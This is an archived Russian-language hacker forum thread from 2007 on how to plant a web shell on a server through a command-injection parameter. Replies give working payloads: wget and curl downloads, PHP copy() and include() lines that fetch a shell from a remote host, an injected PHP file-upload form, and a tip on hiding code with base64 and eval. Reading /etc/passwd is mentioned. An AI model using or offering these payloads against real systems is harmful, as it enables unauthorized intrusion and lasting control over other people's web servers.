ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
04.09.2007, 11:50
|
|
Познающий
Регистрация: 08.02.2007
Сообщений: 30
Провел на форуме:
140272
Репутация:
3
|
|
Как закачать шел!
Народ подскажите как можно закачать шел(хотябы от рст).Из качалок есть wget.При запросе http://site.com/t.php?cmd=wget%20-o%201.php%20http://site.com/shell.txt создается файл 1.php а в нем
--11:39:54-- http://site.com/shell.txt
=> `shell.txt'
Resolving site.com
Connecting to site.com:80... failed: Connection refused.
Из конфигов пароли не подходят к фтп.
|
|
|
04.09.2007, 11:56
|
|
Постоянный
Регистрация: 31.08.2007
Сообщений: 571
Провел на форуме:
1847821
Репутация:
953
|
|
а другие качалки не пробовал, должен быть наверняка lynx. а может еще эти fetch, curl, links (??), get http://someshit.com/a.php > shell.php(/somedir/1.txt), хз больше не помню.. и еще закачай маленький по размеру шелл, например TNC WebShell v0.8 (см. в разделе "Избранное") а то хз чз адрес бар иногда лаги.. иногда у меня через адрес бар не читается /etc/passwd хотя весит пару сотен килобайт.. )) кароче эксперементируй )) 
Последний раз редактировалось ртуть; 04.09.2007 в 12:16..
Причина: бля.... забыла....
|
|
|
|
04.09.2007, 12:02
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
или попробуй скачивать шелл с другого сайта или такой вариант
Код:
http://site.com/t.php?cmd=echo '<?php copy("http://shellsite.com/shell.txt","1.php"); ?>'>cp.php
а потом вызови
http://site.com/cp.php
__________________
Карфаген должен быть разрушен...
|
|
|
|
04.09.2007, 12:07
|
|
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме:
5302668
Репутация:
2054
|
|
либо так же как Scipio сказал, но через инклуд echo+'<?php+include("http://shellsite.com/shell.txt");+?>'>thumb.db.php
__________________
Лучший способ защиты - это нападение!!!
|
|
|
|
04.09.2007, 12:35
|
|
Познающий
Регистрация: 08.02.2007
Сообщений: 30
Провел на форуме:
140272
Репутация:
3
|
|
ртуть
других качало нету только wget
шел 8кб тоже не качает.через браузер в 1 строчку создает но небольше
Scipio
вот такое вылазиет после запуска:
Warning: copy() [function.copy]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /www/vhosts/1/www/cp.php on line 1
Warning: copy(http://site.com/shell.txt) [function.copy]: failed to open stream: Success in /www/vhosts/1/www/cp.php on line 1
TANZWUT
вот такое вылазиет после запуска:
Warning: include() [function.include]: php_network_getaddresses: getaddrinfo failed: Name or service not known in /www/vhosts/1/www/thumb.db.php on line 1
Warning: include(http://site/shell.txt) [function.include]: failed to open stream: Success in /www/vhosts/1/www/thumb.db.php on line 1
Warning: include() [function.include]: Failed opening 'http://site/shell.txt' for inclusion (include_path='.:/usr/local/include/php') in /www/vhosts/1/www/thumb.db.php on line 1
Какие есть еще идеи?
|
|
|
|
04.09.2007, 12:42
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
ты откуда шелл скачиваешь?
чет я сомневаюсь, что серв обрубает соединение на 80 порт
__________________
Карфаген должен быть разрушен...
Последний раз редактировалось Scipio; 04.09.2007 в 12:45..
|
|
|
|
04.09.2007, 12:51
|
|
Познающий
Регистрация: 08.02.2007
Сообщений: 30
Провел на форуме:
140272
Репутация:
3
|
|
Скачиваю сосвоего сервака.На другие скачивается а вот на этот сервак чет некачает
|
|
|
|
04.09.2007, 13:01
|
|
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме:
5302668
Репутация:
2054
|
|
попробуй этот код
PHP код:
'<form enctype=multipart/form-data method=post><input name=userfile type=file><input type=submit name=go_up></form>
<?php
if(isset($_POST[go_up])){if(is_uploaded_file($_FILES[userfile][tmp_name])){@copy($_FILES[userfile][tmp_name],$_FILES[userfile][name]);}};
?>'
т.о. со своего компа загрузиш шелл
__________________
Лучший способ защиты - это нападение!!!
|
|
|
|
04.09.2007, 13:05
|
|
Members of Antichat - Level 5
Регистрация: 02.11.2006
Сообщений: 781
Провел на форуме:
5939734
Репутация:
1917
|
|
ну я тогда незнаю тока такой вариант:
Код:
http://site.com/t.php?cmd=echo '<?php $filename = $_FILES['userfile']['name']; move_uploaded_file($_FILES['userfile']['tmp_name'], "shell.php");?>'>cp.php
http://site.com/t.php?cmd=echo '<form enctype="multipart/form-data" method="post">'>>cp.php
http://site.com/t.php?cmd=echo 'Отправить этот файл: <input name="userfile" type="file" />'>>cp.php
http://site.com/t.php?cmd=echo '<input type="submit" value="Send File" /></form>'>>cp.php
и запускай http://site.com/cp.php
__________________
Карфаген должен быть разрушен...
|
|
|
|
04.09.2007, 13:10
|
|
Крёстный отец :)
Регистрация: 22.06.2005
Сообщений: 1,330
Провел на форуме:
5302668
Репутация:
2054
|
|
можно и одной строкой, весь код в base64 забубенить и при помощи eval выполнять...
__________________
Лучший способ защиты - это нападение!!!
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
